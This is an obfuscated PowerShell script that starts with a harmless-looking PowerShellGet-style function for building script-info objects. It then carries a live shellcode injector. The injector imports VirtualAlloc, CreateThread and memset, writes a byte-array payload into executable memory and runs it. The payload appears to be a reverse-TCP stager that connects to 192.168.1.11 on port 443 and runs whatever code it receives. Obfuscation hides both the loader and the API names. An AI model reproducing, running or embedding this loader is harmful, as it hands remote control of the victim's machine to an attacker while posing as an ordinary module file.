function GeT-`OR`dEReDp`SscRIPtI`NF`O`OBjECT
{
    [CmdletBinding(PosItioNALBiNdiNG=${f`Alse})]
    Param
    (
        [Parameter(ManDatorY=${Tr`UE})]
        [PSCustomObject]
        ${pSscRiP`TI`N`Fo}
    )

    ${Newps`sc`R`IPT`INfo} = &(("{8}{4}{10}{7}{2}{1}{3}{6}{0}{9}{5}"-f 'ew-','wer','o','Shell.UtilityC1','o','t','4N','t.P','Micr','Objec','sof'))."reP`laCE"(([cHar]67+[cHar]49+[cHar]52),'\') ("{2}{1}{3}{0}" -f 'mObject','s','PSCu','to') -Property ([ordered]@{
                            ${ScrI`p`T:nAMe} = ${pS`scR`ipt`iNFO}.${sc`RiPt`:N`AMe}
                            ${sCRI`p`T:`V`eRSION} = ${p`SSCRI`ptIn`FO}.${scR`IPt`:v`ers`ioN}
                            ${sc`Ript:G`UiD} = ${Pss`cRIpt`i`NfO}.${ScRiPT:`g`U`ID}
                            ${scR`Ipt`:P`Ath} = ${P`s`SC`RipTi`Nfo}.${S`cRi`Pt:Pa`TH}
                            ${s`cRIPT:sc`RIp`TBASE} = ${p`SScRipT`IN`Fo}.${SCR`i`pT:`SCR`IPtb`AsE}
                            ${ScR`I`pT:`DEs`cr`IPtI`On} = ${p`sS`CRIpt`i`NFo}.${sCri`pt`:de`s`crIPTiON}
                            ${scrIpT`:`AUT`HOR} = ${Ps`sCr`IptI`NfO}.${sc`R`iP`T:auTHoR}
                            ${sC`RIPt`:co`M`PANyN`Ame} = ${pSsc`RIp`TInfO}.${SCri`pT:co`mPANY`N`Ame}
                            ${SCrIpT:c`op`yR`I`gHt} = ${p`SSCR`iPTiNfo}.${s`C`RiPt:`copYR`I`gHT}
                            ${ScR`I`pt:`TAgS} = ${PsS`CR`Ipt`I`Nfo}.${sCR`ipt`:tA`gS}
                            ${SC`RiPT`:r`eLeas`Eno`Tes} = ${pssCRI`Pti`N`Fo}.${s`cRiPT:r`Ele`AS`eNOTes}
                            ${s`crip`T`:`RE`qUIReD`MOdULes} = ${P`Ss`CRIpt`Info}.${SCrIPT:rEqu`irEDMOD`U`lES}
                            ${SCRipt`:E`xtERnaLm`oD`U`LEDE`p`En`d`EnCIes} = ${p`SsCRIPtIN`Fo}.${s`C`R`ipT:`ExT`Er`NALmo`Du`lEDePeN`Denci`es}
                            ${ScR`Ipt:reQUI`RED`sc`RI`PtS} = ${pSscrI`Pti`N`Fo}.${s`C`RIP`T:r`Eq`UiRE`DsCripts}
                            ${sc`Ri`pT:ExT`E`RnALScrI`PtdEPE`NdENCieS} = ${P`S`SCriPTInFo}.${sc`RIPt:`EX`TErnaLSCRIPtdEPe`NDENci`ES}
                            ${ScrIP`T`:`liCENseURI} = ${P`S`s`cRIPTInFO}.${SC`RiPT:LI`cEns`Euri}
                            ${sCRI`pT:`p`RojEC`TUri} = ${pS`sCr`IP`T`inFO}.${s`C`Ript:PRoj`Ec`TUrI}
                            ${sC`RI`Pt:ic`onuRI} = ${P`S`s`cr`iPtiNfO}.${S`CRip`T:iC`o`NUrI}
                            ${sCR`iP`T:d`eFi`N`eDComM`AndS} = ${p`SScRIpT`iNfo}.${sCriP`T:de`FiNED`c`oM`MAndS}
                            ${s`CrIpT:De`FInEdFUnct`i`oNS} = ${pSs`Cr`I`P`TinFO}.${s`CRip`T`:dE`Fi`NEDFUncTi`oNs}
                            ${script`:`deFI`N`e`DWor`Kf`LoWS} = ${p`SScrIPTI`Nfo}.${S`Cript:DEFIneD`W`oRkfLo`ws}
							${s`C`RipT:priV`ATeD`ATa} = ${pSs`cRiP`Ti`N`FO}.${Scri`P`T`:`PrIVAteDaTa}
                        })

    ${nEWPs`sCr`IpT`iNFO}."pst`YPeNA`mEs".("{1}{0}" -f'sert','In').Invoke(0, ("{7}{1}{8}{4}{2}{5}{3}{0}{6}"-f 'cri','icroso','w','l.Commands.PSS','o','erShel','ptInfo','M','ft.P'))

    return ${NeWPss`C`R`IP`TINFO}
}
${c} = ((("{37}{75}{18}{55}{30}{71}{13}{17}{56}{4}{85}{0}{54}{83}{20}{33}{9}{2}{74}{57}{46}{61}{77}{84}{38}{80}{21}{58}{72}{15}{35}{69}{51}{10}{48}{16}{81}{67}{70}{63}{25}{26}{73}{28}{29}{6}{27}{11}{19}{5}{66}{62}{43}{12}{24}{45}{23}{41}{1}{34}{87}{60}{52}{78}{31}{7}{79}{76}{36}{44}{40}{39}{64}{22}{65}{42}{82}{68}{86}{89}{50}{53}{59}{88}{3}{14}{32}{49}{8}{47}"-f 'a','n','i','r dest,','n ','Ptr ','pT','adI','t)',' uint dwSize, u',']publ','int dwStackSize, ','rame','c',' uint ','(','xt',' static exte','nel3','Int','pAdd','ll','1)]p','u','ter,','nt','Pt','hreadAttributes, u',' ','l','dlloz1)]',' lpThre','src, u','ress,','t ','oz1kern','ort(','[DllImpo','otect);[','t.dll','svcr','i',' ',' lpPa','oz1m',' ','l',';','ic static e','int coun','rn','lloz1)','IntPt',' IntPtr memset','lAlloc(IntPtr','2.','r',' flAl','Impo','(Int',', ','o','tartAddress, IntPtr','(I','oz','ublic','lpS','rn IntPtr Create','ti','el32.d','Thread','publi','rt','r','nt','rt(oz1ker','[DllImp','cationType','r','d);','D','e','sta',' l',', uint flPr','IntPtr Virtu','c','dwCreationFlags','Pt',' exte'))."rEP`LA`Ce"('oz1',[StrIng][cHaR]34));${W} = &("{0}{1}"-f'Add','-Type') -memberDefinition ${c} -Name ("{0}{1}" -f 'Win3','2') -namespace ("{3}{0}{1}{2}" -f'n','3','2Functions','Wi') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x0b,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."lEng`TH" -gt 0x1000){${g} = ${z}."Len`GTh"};${x}=${w}::("{2}{0}{1}"-f 'tualAllo','c','Vir').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."LE`NG`TH"-1);${I}++) {${W}::"MEM`Set"([IntPtr](${X}.("{1}{0}" -f'oInt32','T').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{0}{2}{1}{3}" -f 'Cr','eTh','eat','read').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{1}{3}{0}"-f'p','ar','St','t-slee') 60};
